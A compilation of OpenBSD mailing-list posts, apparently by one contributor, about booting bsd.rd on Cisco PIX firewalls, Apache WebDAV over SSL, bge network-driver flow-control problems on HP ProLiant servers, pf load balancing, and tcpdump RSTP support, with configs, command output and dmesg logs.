pix706.bin:  x86 boot sector

bsd.rd:  ELF 32-bit LSB executable, Intel 80386, version 1  
(SYSV), statically linked, not stripped


floppy40.fs: x86 boot sector

/Pete


On 13. nov. 2006, at 16.06, Jason George wrote:


most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the
past, nothing special except flash boot.

pix515e# sh ver
...
Hardware:   PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff0, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
...
0: Ext: Ethernet0   : address is 0012.00e1.cd67, irq 10
1: Ext: Ethernet1   : address is 0012.00e1.cd68, irq 11
2: Ext: Ethernet2   : address is 000e.0c59.bd1a, irq 11
...
Interface Ethernet0 "outside", is up, line protocol is up
  Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
...

they usually even come with a (non functioning under PIXOS) USB port
too.



I grabbed an old PIX 501 off the shelf... no such luck booting a  
standard i386

ramdisk image.


CISCO SYSTEMS PIX-501
Embedded BIOS Version 4.3.200 07/31/01 15:58:22.08
Compiled by morlee
16 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class  Irq
 00  00  00   1022   3000  Host Bridge
 00  11  00   8086   1209  Ethernet   9
 00  12  00   8086   1209  Ethernet   10

Cisco Secure PIX Firewall BIOS (4.2) #6: Mon Aug 27 15:09:54 PDT 2001
Platform PIX-501
Flash=E28F640J3 @ 0x300

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Flash boot interrupted.
0: i8255X @ PCI(bus:0 dev:17 irq:9 )
1: i8255X @ PCI(bus:0 dev:18 irq:10)

Using 1: i82557 @ PCI(bus:0 dev:18 irq:10), MAC: 0011.935f.08c6
Use ? for help.
monitor> addr 192.168.4.234
address 192.168.4.234
monitor> server 192.168.4.3
server 192.168.4.3
monitor> file bsd.rd
file bsd.rd
monitor> ping 192.168.4.3
Sending 5, 100-byte 0xc3f8 ICMP Echoes to 192.168.4.3, timeout is 4  
seconds:

!
Success rate is 100 percent (5/5)
monitor> tftp
tftp [EMAIL PROTECTED]
[snip]

Received 4938658 bytes
Bad magic number (0xab00450)
monitor>

Re: WebDAV

[Pete Vickers]

Hi,

I've used it problem free with osx & windows clients; it should  
probably only be available only over https,



   DocumentRoot "/var/www/secure_content"
ServerName whatever.com
ServerAlias www.whatever.com
ServerAdmin [EMAIL PROTECTED]
ErrorLog logs/error_log
TransferLog logs/access_log

DAV On
AuthType Basic
AuthName "whatever.com network disk"
AuthUserFile /var/www/conf/passwd
AllowOverride None
Require valid-user
Options None
LOCK UNLOCK>



DAVLockDB /dav_scratch/DAVLock
DAVMinTimeout 600
SSLEngine on
SSLCertificateFile/etc/ssl/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
CustomLog logs/ssl_request_log \
  "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



/Pete



On 1. des. 2006, at 22.00, Gaby Vanhegan wrote:


Hi,

Although the mail archives have little on the topic, as does google,
are there any major security concerns I should be aware of when
installing mod_dav under the stock OpenBSD apache1.3, with apache
chrooted?

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/

Performance problems with bge under OpenBSD4.0/i386

[Pete Vickers]

Hi,

I'm trying to track down the cause of poor network performance under  
OpenBSD4.0/i386 on HP Proliants (DL380-G4 and DL360-G4p), which seems  
to be concerning ethernet 802.3x flow control on the bge NICs.



Test topology is:

HP DL380-G4
  int bge0 (BCM5704C auto at 1000baseT full-duplex)
|
|
  int Gig 13/6  (auto at 1000baseT full-duplex)
Cisco 6513 chassis + WS-X6548-GE-TX + WS-X6748-GE-TX
  int Gig 12/47 (auto at 1000baseT full-duplex)
|
|
  int bge0 (BCM5704C auto at 1000baseT full-duplex)
HP DL360-G4p


Test traffic is generated with:

On Source:  dd if=/dev/zero bs=1k count=1 | nc _peer_ 1234
On Sink:nc -l 1234 > /dev/null



With 4.0-release kernel (GENERIC#1107), the bge driver does not  
negotiate flowcontrol with the switch:


switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6
PortSend FlowControl  Receive FlowControl  RxPause TxPause
adminoper adminoper
Gi12/47 desired  off  desired  off 0   0
Gi13/6  desired  off  desired  off 0   0


Network traffic is very slow and the receiving host reports  
significant 'Input errors' on the NIC interface after transfer:


source~> netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:18:fe:32:2e:4a 1050 0  
1276 0 0

source~> dd if=/dev/zero bs=1k count=10 | nc _peer_ 1234
10+0 records in
10+0 records out
10240 bytes transferred in 13.219 secs (7746244 bytes/sec)
source~> netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:18:fe:32:2e:4a52684 0 
73166 0 0


sink~> netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:17:a4:45:f5:25   79 0   
106 0 0

sink~> nc -l 1234 > /dev/null
sink~> netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:17:a4:45:f5:257084111 
50894 0 0





With 4.0-snapshot kernel (GENERIC#1362), the bge driver now  
negotiates flow control:


switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6
PortSend FlowControl  Receive FlowControl  RxPause TxPause
adminoper adminoper
Gi12/47 desired  on   desired  on  0   0
Gi13/6  desired  on   desired  on  0   0

However, the transfer is still very slow, and the receiving host  
still reports significant 'Input errors' on the NIC interface after  
transfer:


source~> netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:18:fe:32:2e:4a 1459 0  
1762 0 0

source~> dd if=/dev/zero bs=1k count=10 | nc _peer_ 1234
10+0 records in
10+0 records out
10240 bytes transferred in 14.120 secs (7251650 bytes/sec)
source ~>netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:18:fe:32:2e:4a53240 0 
73457 0 0



sink~> netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:17:a4:45:f5:25   89 0
98 0 0

sink~>  nc -l 1234 > /dev/null
sink~> netstat -i -I bge0 | grep -e Name -e Link
NameMtu   Network Address  Ipkts IerrsOpkts  
Oerrs Colls
bge0150000:17:a4:45:f5:2570849 9 
51186 0 0




To summarise, it seems as though flow-control is negotiated for both  
TX & RX in the recent bge driver, but is only functional for TX (if  
at all). The only relevant source change I can find is:


http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/pci/if_bge.c.diff? 
r1=1.202&r2=1.203&f=h
"Flow control support for bge(4)/brgphy(4).  From brad@ based on code  
fromNetBSD"

with includes the comment /* We can do both TXPAUSE and RXPAUSE. */

Setting 'ifconfig bge0 debug' provides no additional output. I have  
also repeated the tests with serveral differnet servers, NICs (all  
bge) and cables and switches to remove faulty device issues.



Has anyone an ideas on fixes for this, or how to debug the issue  
further ?


Dmesg below


/Pete



# dmesg
OpenBSD 4.0-current (GENERIC) #1362: Fri Feb  9 14:26:43 MST 2007
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,H

Re: Performance problems with bge under OpenBSD4.0/i386

[Pete Vickers]

Very Interesting.

On the switch I can set the port flow-control to on, off or  
desirable. The following is the blurb on those configuration options:



Gigabit Ethernet Flow Control Keyword Functions, Keywords : Function

receive on: The port uses flow control dictated by the neighbor port.

receive desired: The port uses flow control if the neighbor port uses  
it, and does not use flow control if the neighbor port does not use it.


receive off: The port does not use flow control, regardless of  
whether flow control is requested by the neighbor port.


send on: The port sends flow-control frames to the neighbor port.

send desired: The port sends flow-control frames to the neighbor port  
if the neighbor port asks to use flow control.


send off: The port does not send flow-control frames to the neighbor  
port.


However, irrespective of what I configure the port flow-control to on  
the switch (and then reboot the OpenBSD host, to be sure of correct  
interface initialisation) I cannot be ifconfig to report {tx|rx}pause.


Is this likely to be a driver problem, or is there some broken flash  
code on the bge NIC (which I could possible update) ?



/Pete

On 14. feb. 2007, at 22.42, Mark Kettenis wrote:


From: Pete Vickers <[EMAIL PROTECTED]>
Date: Wed, 14 Feb 2007 13:33:25 +0100

# ifconfig bge0
bge0: flags=8843 mtu 1500
 lladdr 00:17:a4:45:f5:25
 groups: egress
 media: Ethernet autoselect (1000baseT full-duplex)
 status: active
 inet6 fe80::217:a4ff:fe45:f525%bge0 prefixlen 64 scopeid 0x1
 inet x.x.x.x netmask 0xff00 broadcast x.x.x.x


This suggests flow control has *not* been negotiated.  With msk(4), I
get:

borodin$ ifconfig msk0
msk0: flags=8843 mtu 1500
lladdr 00:16:cb:a2:87:67
groups: egress
media: Ethernet autoselect (1000baseT full- 
duplex,rxpause,txpause)

status: active
inet6 fe80::216:cbff:fea2:8767%msk0 prefixlen 64 scopeid 0x1
inet 192.168.0.17 netmask 0xff00 broadcast 192.168.0.255

Re: FTP-Proxy

[Pete Vickers]

On 20. sep. 2006, at 10.22, Alan Smith wrote:

*> or a machine with dual nics - one inside and one outside the  
firewall.

*
*Rod Dorman wrote:
*This is effectively getting rid of the PIX!
*
*If  its got both an inside and outside interface it can be  
configured as
*a gateway such that any inside host can get outside completely  
bypassing

*the PIX.  Are you sure your network admins are OK with that?

Ok - never write tehnical mails after 14 hours on a plane - they  
make no sense!!!  In a nutshell, I need to know if I can use ftp- 
proxy on a machine inside our current PIX firewall. If it will only  
run on a machine running PF acting as the main firewall/gateway  
then I'm out of luck. I will not be using it if the only way would  
be a nic inside and outside of the firewall.


Sorry for the confusion (and thanks for the reply Rod)

Alan


Hi,

A few thoughts for you to explore:

1. A good number of web browsers etc support authenticated ftp  
'upload' via a proxy (e.g. squid), thus fixing your problem -  
googling direct you on this...


2. if you can put an openbsd box on the inside of the PIX, and make  
the client traffic go via it (e.g. their default gateway), then you  
can use the ftp-proxy.


3. recent PIXen support WCCP2 protocol, as does squid (i believe it's  
just a GRE tunnel basically), so maybe you could run squid on openbsd  
to direct traffic appropriately, once redirect from the PIX.


food for thought anyway

/Pete

rndc/named automatic key generation

[Pete Vickers]

Following OpenBSD's automatic generation of ssh and isakmp keys,  
prehaps the following would be a worthwhile addition to /etc/rc to  
generate a key/config for rndc/named.


==
if [ ! -f /etc/rndc.conf ]; then
echo -n "rndc-confgen: generating new RNDC key... "
if /usr/sbin/rndc-confgen | tee /etc/rndc.conf \
 | grep '^# [^SEU]' >> /var/named/etc/named.conf; then
chown root:named /etc/rndc.conf /var/named/etc/ 
rndc.conf

chmod 640 /etc/rndc.conf /var/named/etc/rndc.conf
echo done.
else
echo failed.
fi
fi
==

Notes:
1. I stopped short of piping through a "sed '/^#//'" so that it still  
remains disabled by default.
2. I guess there is a better way than the late chown/chmod calls, but  
I guess it's ok, since we are still pre-login during rc.


/Pete

Re: rndc/named automatic key generation

[Pete Vickers]

On 28. sep. 2006, at 02.30, Spruell, Darren-Perot wrote:


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]

Following OpenBSD's automatic generation of ssh and isakmp
keys, prehaps the following would be a worthwhile addition to
/etc/rc to generate a key/config for rndc/named.


/etc/rc already handles that during named startup.

DS



Ahh, yep, should have read through the rest of /etc/rc before posting...


While I'm there though, is there any reason (other than historical)  
for the following to anomalies:


- the installer script turns sshd on in /etc/rc.conf rather than /etc/ 
rc.conf.local


- the installer script's line for ntpd in /etc/rc.conf.local doesn't  
use "" like all the example's in /etc/rc


if it's just a matter of diffs, I'm more than willing to try and  
submit them...



/Pete

bge problems on HP DL360 G4p with -current

[Pete Vickers]

Hi,

I'm running an OpenBSD/i386 recent snapshot on a few 'HP DL360 G4p's,  
all seems good apart from the first NIC (bge0) will not see the LAN.


An 'ifconfig bge0' output cycles between "media: Ethernet autoselect  
(none)" and "media: Ethernet autoselect (loopback)", with "status: no  
carrier" and will not connect to the LAN.


However if I relocate the cable to bge1 then it connects perfectly  
and 'ifconfig bge1' shows "media: Ethernet autoselect (1000baseT full- 
duplex)" and "status: active".


I've tried 5 identical machines, with different switch ports and  
cables, and behaviour is consistent: bge0 always fails, and bge1  
always works. I've also tried moving the NICs from IRQ 7 to IRQ5,  
(they are forced to use same IRQ) in the BIOS without effect. Thus  
I'm pretty sure the problem is not switch, cabling or server  
hardware. Adding the debug flag on bge0 reveals nothing in logs.


In the short term I can run on just bge1, but I'm hoping to do NIC/ 
switch redundancy via trunk(4) so I'll need bge0. Any suggestions  
greatly recieved.


Full dmesg below.


thanks,

/Pete


[EMAIL PROTECTED] ~>cat /var/run/dmesg.boot
OpenBSD 4.0-current (GENERIC) #1134: Mon Oct  2 19:44:53 MDT 2006
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- 
CPL,EST,CNXT-ID,CX16

cpu0: EST: strange msr value 0x112d112d
real mem  = 2147000320 (2096680K)
avail mem = 1950441472 (1904728K)
using 4256 buffers containing 107454464 bytes (104936K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @  
0xf, SMBIOS rev. 2.3 @ 0xec000 (73 entries)

bios0: HP ProLiant DL360 G4p
pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 6300ESB LPC" rev  
0x00)

pcibios0: PCI bus #13 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0c
ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0c
pci1 at ppb0 bus 13
ppb1 at pci0 dev 4 function 0 "Intel MCH PCIE" rev 0x0c
pci2 at ppb1 bus 6
ppb2 at pci2 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci3 at ppb2 bus 7
ppb3 at pci2 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci4 at ppb3 bus 10
ppb4 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0c
pci5 at ppb4 bus 3
ppb5 at pci0 dev 28 function 0 "Intel 6300ESB PCIX" rev 0x02
pci6 at ppb5 bus 2
ciss0 at pci6 dev 1 function 0 "Compaq Smart Array 64xx" rev 0x01: irq 7
ciss0: 1 LD, HW rev 1, FW 2.68/2.68
scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0:  SCSI0 0/ 
direct fixed
sd0: 140006MB, 140006 cyl, 64 head, 32 sec, 512 bytes/sec, 286734240  
sec total
bge0 at pci6 dev 2 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704  
B0 (0x2100): irq 7, address 00:18:fe:32:1e:08

brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
bge1 at pci6 dev 2 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704  
B0 (0x2100): irq 7, address 00:18:fe:32:1e:07

brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
uhci0 at pci0 dev 29 function 0 "Intel 6300ESB USB" rev 0x02: irq 5
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
uhci1 at pci0 dev 29 function 1 "Intel 6300ESB USB" rev 0x02: irq 5
usb1 at uhci1: USB revision 1.0
uhub1 at usb1
uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub1: 2 ports with 2 removable, self powered
"Intel 6300ESB WDT" rev 0x02 at pci0 dev 29 function 4 not configured
"Intel 6300ESB APIC" rev 0x02 at pci0 dev 29 function 5 not configured
ehci0 at pci0 dev 29 function 7 "Intel 6300ESB USB" rev 0x02: irq 7
usb2 at ehci0: USB revision 2.0
uhub2 at usb2
uhub2: Intel EHCI root hub, rev 2.00/1.00, addr 1
uhub2: 4 ports with 4 removable, self powered
ppb6 at pci0 dev 30 function 0 "Intel 82801BA AGP" rev 0x0a
pci7 at ppb6 bus 1
vga1 at pci7 dev 3 function 0 "ATI Rage XL" rev 0x27
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
"Compaq iLO" rev 0x01 at pci7 dev 4 function 0 not configured
"Compaq iLO" rev 0x01 at pci7 dev 4 function 2 not configured
ichpcib0 at pci0 dev 31 function 0 "Intel 6300ESB LPC" rev 0x02
pciide0 at pci0 dev 31 function 1 "Intel 6300ESB IDE" rev 0x02: DMA,  
channel 0 configured t

Re: pf load balancing and failover

[Pete Vickers]

Hi,


If I recall correctly, slbd adds new rules to pf for each incoming  
tcp session. Since I couldn't get it to work (old version) I do not  
know what the session and Sources tables will look like, but I  
suspect there will be no problems with them in slbd. Client-server  
association is maintained by slbd and implemented with separate rules  
for each tcp session.


This seems a bit ineffective and rather pointless since pf has the  
load balancing functionality built in.


The problems with using pf and a health checking script is related to  
removal of failed backends. There are two separate issues:


 1) When using sticky-address in the rdr rules client-server
associations are added to the internal Sources table.
It is impossible to remove entries for a single backend from this
table. If a backend fails and is removed from the rdr destination
table this table will have to be flushed, making all clients end  
up on

new backends, wich is unacceptable in many configurations.
If this table is not cleared then the rdr destination table is not
inspected for client IP's found in the Sources table. These clients
will still be sent to the failed and removed backend.
Preferably entries could be removed from this table based on
source-IP and backend-IP:backend-port, and maybe even the virtual
service IP:port or a pf rule number.

 2) TCP sessions to a failed backend will continue to exist after the
backend is removed from the rdr destination table. As of today  
these

sessions can be removed with pfctl by specifying the source and
destination IP addresses. Since different services can run on
differerent port numbers on the same machines it should be  
possible to

specify a destination port number as well.
I guess that if a backend dies then the client is notified about  
this
just as if it had been speaking directly to the backend, so it  
might

not be necessary to clean out these sessions at all, and maybe even
the tcpdrop tool will do the trick?

Anyway, main issue is with removing single sessions from the internal  
Sources table (as it is called in pfctl(8)).



/Pete




On 22. okt. 2006, at 21.13, Kevin Reay wrote:


On 10/22/06, Per-Olov Sjvholm <[EMAIL PROTECTED]> wrote:

Hi again

I am looking at the CVS. I can't see its possible to out of the  
box remove
addresses from  a round robin scheme in PF against a faulty web  
server. Am I

missing something?

But I maybe misunderstood Kevin Reay that in this thread said:  
"and it would
automatically remove the address from a pf poll (and optionality  
run a

command) when a host failed.".

Maybe I have to do some scripting after all...


It can be a little confusing at first, but it makes a lot of sense
once you understand it. The way I remember it, a person creates a
config file for slbd that defines the various pools and their polling
methods, and slbd creates the load balancing pools in pf at start-up
automatically (in an anchored ruleset). Then it removes entries from
those pools when a server goes down. So... no scripting required.

Of course, Bill Marquette will probably have more knowledge/details
about this then me...

Kevin

Re: pf load balancing and failover

[Pete Vickers]

Hi Per-Olav,

If you are dealing with http based services, rather than generic tcp,  
then you could take a look at 'pound'. I did a port of it a while  
back, and use it in pretty large scale environment here, it supports  
sticky backend etc. Works well for me, YMMV.


http://marc.theaimsgroup.com/?l=openbsd-ports&m=115513682623098

/Pete


On 26. okt. 2006, at 23.26, Per-Olov Sjvholm wrote:


On Thursday 26 October 2006 22:28, Kevin Reay wrote:

Hey,

On 10/26/06, Pete Vickers <[EMAIL PROTECTED]> wrote:

If I recall correctly,


You don't. :o)


slbd adds new rules to pf for each incoming
tcp session. Since I couldn't get it to work (old version) I do not
know what the session and Sources tables will look like, but I
suspect there will be no problems with them in slbd. Client-server
association is maintained by slbd and implemented with separate  
rules

for each tcp session.


slbd doesn't maintain separate rules for each tcp session. Client- 
server

association is NOT maintained by slbd.


This seems a bit ineffective and rather pointless since pf has the
load balancing functionality built in.


Which slbd relies on. Slbd just inserts the load balancing rules into
pf based on it's own config. Then it does the job of health-checking
the servers listed in it's config file, and removing them from the
server list if they go down.

The problems with using pf and a health checking script is  
related to

removal of failed backends. There are two separate issues:

  1) When using sticky-address in the rdr rules client-server
 associations are added to the internal Sources table.
 It is impossible to remove entries for a single backend from  
this
 table. If a backend fails and is removed from the rdr  
destination
 table this table will have to be flushed, making all clients  
end

up on
 new backends, wich is unacceptable in many configurations.
 If this table is not cleared then the rdr destination table  
is not
 inspected for client IP's found in the Sources table. These  
clients

 will still be sent to the failed and removed backend.
 Preferably entries could be removed from this table based on
 source-IP and backend-IP:backend-port, and maybe even the  
virtual

 service IP:port or a pf rule number.


Which is what slbd avoids. slbd doesn't use sticky-address for  
this reason.

slbd seems mostly geared for web servers where the web application
is written well enough to not need each request to go back to the  
same

server.

Kevin


Hi Kevin

I can come up with 100 reasons for using the same web target server  
over a
whole session and very few for not doing it. Can't see we can use  
slbd for
the ordering system as intended if requests goes to just any server  
in the

pool.

Or did I miss anything?

Regards
/Per-Olov

Re: pf load balancing and failover

[Pete Vickers]

Hi Berk,

I'm really intereted in this. I have a load of legacy tcp session  
based load balancing with I'd love to migrate to an OpenBSD/pf based  
solution. Do you have a patch with applies cleanly to 4.0 ?


/Pete


On 26. okt. 2006, at 22.16, Berk D. Demir wrote:


Pete Vickers wrote:

 1) When using sticky-address in the rdr rules client-server
associations are added to the internal Sources table.
It is impossible to remove entries for a single backend from this
table. If a backend fails and is removed from the rdr destination
table this table will have to be flushed, making all clients  
end up on

new backends, wich is unacceptable in many configurations.
If this table is not cleared then the rdr destination table is  
not
inspected for client IP's found in the Sources table. These  
clients

will still be sent to the failed and removed backend.
Preferably entries could be removed from this table based on
source-IP and backend-IP:backend-port, and maybe even the virtual
service IP:port or a pf rule number.
 2) TCP sessions to a failed backend will continue to exist after the
backend is removed from the rdr destination table. As of today  
these

sessions can be removed with pfctl by specifying the source and
destination IP addresses. Since different services can run on
differerent port numbers on the same machines it should be  
possible to

specify a destination port number as well.
I guess that if a backend dies then the client is notified  
about this
just as if it had been speaking directly to the backend, so it  
might
not be necessary to clean out these sessions at all, and maybe  
even

the tcpdrop tool will do the trick?
Anyway, main issue is with removing single sessions from the  
internal Sources table (as it is called in pfctl(8)).


I've submitted a patch, adding a new ioctl to pf and an  
implementation to clear src-track entries likewise states  (-k  
1.1.1.1 -k 2.3.5.0/23).


A patched build (smt. between 4.0 and -current) is running in many  
DCs in my county right now.


pfctl.c changed after my submission. I have to fix the patches and  
post here in case it helps.


It needs to get OKs from developers to get into the tree. Last  
touch with a developer about this patch was with dhartmei on Jul 25.


(I'll post it tomorrow)

Re: bridge(4) RSTP

[Pete Vickers]

Hi,

A nice start could be to teach our tcpdump about RSTP. At present it  
just pukes:


20:30:14.196199 802.1d unknown protocol ver(0x2)

/Pete



On 27. okt. 2006, at 13.35, Stuart Henderson wrote:


FreeBSD have early support for rapid STP in bridge(4):

http://lists.freebsd.org/pipermail/freebsd-current/2006-October/ 
066535.html

http://people.freebsd.org/~thompsa/bridge_rstp.20061012.diff

I'll try and look at it sometime, but knowing how far I got last time
I tried porting any kernel code (not very...and they have made quite a
few changes to bridge(4) since importing it via NetBSD last year)
I thought it may be worth drawing attention to here in case anyone
else is interested.

Re: bridge(4) RSTP

[Pete Vickers]

Hi,

Patch applies cleanly and appears to work great:

[EMAIL PROTECTED] ~> tcpdump -i bge1 stp
tcpdump: listening on bge1, link-type EN10MB
15:25:02.061139 802.1d RSTP config flags=0x3c  
root=6011.0:18:74:61:e5:40 rootcost=0x0 bridge=6011.0:18:74:61:e5:40  
port=0x8630 age=0/0 max=20/0 hello=2/0 fwdelay=15/0


I'm not coders either so I can't review your patch's quality, but  
would be good to get it verified & in the tree.


thanks.

/Pete




On 29. okt. 2006, at 14.15, Stuart Henderson wrote:


On 2006/10/27 14:03, Pete Vickers wrote:

A nice start could be to teach our tcpdump about RSTP. At present it
just pukes:


something like this? (coding style probably sucks, but I'm no coder :)

Index: print-stp.c
===
RCS file: /data/cvsroot/OpenBSD/src/usr.sbin/tcpdump/print-stp.c,v
retrieving revision 1.4
diff -u -r1.4 print-stp.c

subversion with mod_dav_svn

[Pete Vickers]

Hi,

Anybody got subversion running well under OpenBSD with the http/ 
webdav transport ? It seems to require apache2 amongst a whole shed  
load of other dependancies. Google throws up nothing less than 4  
years old, so really just after any experiences to shortcut my legwork.


thanks

/Pete

Re: PCI-X not seen by 3.8 on HP DL-145 G2

[Pete Vickers]

On 9. des. 2005, at 10.01, Srebrenko Sehic wrote:




2) DL145 (G2), SATA/nForce4 = works, but the disk is slow and the CPU
spends 100% of time in kernel with heavy disk activity. (tested on
i386/3.8-STABLE)




for my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s  
( with CPU at 99% idle)


[EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000
1000+0 records in
1000+0 records out
1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec)
[EMAIL PROTECTED] /root>

... since it's a  2xAMD64 CPU box I'm running amd64 GENERIC.MP (- 
current), the only problem I experienced was crashing on boot with  
ipmi. once that was disabled, all is fine)


(you wouldn't believe how fast this thing chews through the key gen  
on first boot :-)



[EMAIL PROTECTED] /root> cat /var/run/dmesg.boot
OpenBSD 3.8-current (GENERIC.MP) #0: Wed Nov 30 01:23:39 CET 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2146140160 (2095840K)
avail mem = 1835208704 (1792196K)
using 22937 buffers containing 214822912 bytes (209788K) of memory
mainbus0 (root)
ipmi at mainbus0 not configured
mainbus0: Intel MP Specification (Version 1.4) (AMD  HAMMER  )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: AMD Opteron(tm) Processor 252, 2612.35 MHz
cpu0:  
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB  
64b/line 16-way L2 cache
cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully  
associative
cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully  
associative

cpu0: apic clock running at 200925952Hz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz
cpu1:  
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB  
64b/line 16-way L2 cache
cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully  
associative
cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully  
associative

mpbios: bus 0 is type PCI
mpbios: bus 1 is type PCI
mpbios: bus 2 is type PCI
mpbios: bus 3 is type PCI
mpbios: bus 4 is type PCI
mpbios: bus 128 is type PCI
mpbios: bus 129 is type PCI
mpbios: bus 134 is type PCI
mpbios: bus 139 is type ISA
ioapic0 at mainbus0 apid 2: pa 0x8373cf24, version 11, 24 pins
ioapic1 at mainbus0 apid 3: pa 0x8373ce24, version 11, 7 pins
ioapic2 at mainbus0 apid 4: pa 0x8373cc24, version 11, 7 pins
pci0 at mainbus0 bus 0: configuration mode 1
"Nvidia nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured
pcib0 at pci0 dev 1 function 0 "Nvidia nForce4 ISA" rev 0xa3
"Nvidia nForce4 SMBus" rev 0xa2 at pci0 dev 1 function 1 not configured
ohci0 at pci0 dev 2 function 0 "Nvidia nForce4 USB" rev 0xa2: apic 2  
int 10 (irq 10), version 1.0, legacy support

usb0 at ohci0: USB revision 1.0
uhub0 at usb0
uhub0: Nvidia OHCI root hub, rev 1.00/1.00, addr 1
uhub0: 4 ports with 4 removable, self powered
ehci0 at pci0 dev 2 function 1 "Nvidia nForce4 USB" rev 0xa3: apic 2  
int 11 (irq 11)

ehci0: timed out waiting for BIOS
usb1 at ehci0: USB revision 2.0
uhub1 at usb1
uhub1: Nvidia EHCI root hub, rev 2.00/1.00, addr 1
uhub1: 4 ports with 4 removable, self powered
pciide0 at pci0 dev 6 function 0 "Nvidia nForce4 IDE" rev 0xa2: DMA,  
channel 0 configured to compatibility, channel 1 configured to  
compatibility

pciide0: channel 0 disabled (no drives)
pciide0: channel 1 disabled (no drives)
pciide1 at pci0 dev 8 function 0 "Nvidia nForce4 SATA 2" rev 0xa3: DMA
pciide1: using apic 2 int 10 (irq 10) for native-PCI interrupt
wd0 at pciide1 channel 0 drive 0: 
wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
wd0(pciide1:0:0): using PIO mode 4, Ultra-DMA mode 5
